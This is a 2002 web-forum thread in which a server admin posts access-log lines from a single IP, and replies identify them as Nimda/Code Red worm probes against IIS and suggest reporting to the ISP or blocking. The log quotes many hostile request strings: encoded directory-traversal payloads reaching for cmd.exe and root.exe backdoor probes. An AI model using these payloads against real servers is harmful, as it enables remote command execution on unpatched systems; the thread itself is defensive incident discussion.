What do you guys make of this (Includes log except, not that big)

Dev Shed Forums Sponsor:

February 14th, 2002, 06:01 PM

Tundra

Contributing User

Join Date: Oct 2001

Location: Honolulu, Hawaii

Posts: 261

Time spent in forums: 1 Day 6 h 6 m 22 sec
Reputation Power: 9

What do you guys make of this (Includes log except, not that big)

Obviously, this was an attack, but the entries were made within the range of 8 seconds of each other. Thankfully, this is directed at WinNT machine, so I wasn't effected at all. What do you guys think, just a kiddie looking for some fun, or did I fall asleep during the a security announcement.

The following is an except of my log files:

204.210.159.60 - - [14/Feb/2002:08:41:16 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:16 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:17 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:18 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:21 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:08:41:25 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:25 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:26 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:08:41:26 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:08:41:27 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:08:41:27 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:08:41:29 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:08:41:32 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.210.159.60 - - [14/Feb/2002:08:41:37 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "
-"
204.210.159.60 - - [14/Feb/2002:08:41:40 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "
-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:46 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:46 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:56 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:57 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:03:59 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:09:04:02 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:03 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:03 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:04:51 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:04:53 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:05:05 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:05:11 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:05:14 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:05:18 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "
-"
204.210.159.60 - - [14/Feb/2002:09:05:23 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "
-" "-"
204.210.159.60 - - [14/Feb/2002:09:05:29 -1000] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:09:48:52 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:48:55 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:48:57 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:03 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:06 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:09:49:09 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:13 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:15 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:09:49:21 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:49:24 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:49:27 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:49:52 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:49:55 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.210.159.60 - - [14/Feb/2002:09:50:07 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "
-"
204.210.159.60 - - [14/Feb/2002:12:23:00 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:08 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:11 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:23 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:29 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:12:34:35 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:12:34:40 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:42 -1000] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 210 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:47 -1000] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 208 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:51 -1000] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:55 -1000] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 218 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:22:59 -1000] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "-" "
-"
204.210.159.60 - - [14/Feb/2002:13:23:05 -1000] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:09 -1000] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HT
TP/1.0" 404 249 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:13 -1000] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winn
t/system32/cmd.exe?/c+dir HTTP/1.0" 404 265 "-" "-"
204.210.159.60 - - [14/Feb/2002:13:23:17 -1000] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:13:23:22 -1000] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:13:23:26 -1000] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:13:23:30 -1000] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 231 "-"
"-"
204.210.159.60 - - [14/Feb/2002:13:23:35 -1000] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-"
"-"
204.210.159.60 - - [14/Feb/2002:13:23:38 -1000] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "
-"
204.210.159.60 - - [14/Feb/2002:13:23:41 -1000] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 232 "
-" "-"

February 14th, 2002, 06:06 PM

Bob Loblaw

Contributing User

Join Date: Dec 2001

Posts: 174

Time spent in forums: < 1 sec
Reputation Power: 7

Not good your gonna have to build your servers from scratch

just kidding it's nothing that affects apache
nimda,code red whatever iis

February 14th, 2002, 06:12 PM

mezz

Contributing User

Join Date: Oct 2001

Posts: 310

Time spent in forums: < 1 sec
Reputation Power: 7

204.210.159.60 has Nimda, CodeRed and CodeRedII that attack on your place often.. I would suggest you to contact his/her ISP to make sure ISP will get contact with them to fix their box. I have read few articles about that few ISP can close their accounts until they get those computers fix as well.

February 14th, 2002, 10:20 PM

freebsd

Contributing User

Join Date: Jan 2001

Posts: 5

Time spent in forums: < 1 sec
Reputation Power: 0

>> Includes log except not that big

Then don't log them. Start here if that makes you feel more secure when you don't see them in your log.

If you need to block them at firewall level, write a setuid script and insert a dynamic ruleset.

If you really care, you should log them little bit as evidence, then block them on-the-fly, then report to their ISPs.

Thread Tools	Search this Thread
Email this Page	Search this Thread: Advanced Search
Display Modes	Rate This Thread
Linear Mode Switch to Hybrid Mode Switch to Threaded Mode	Rate This Thread: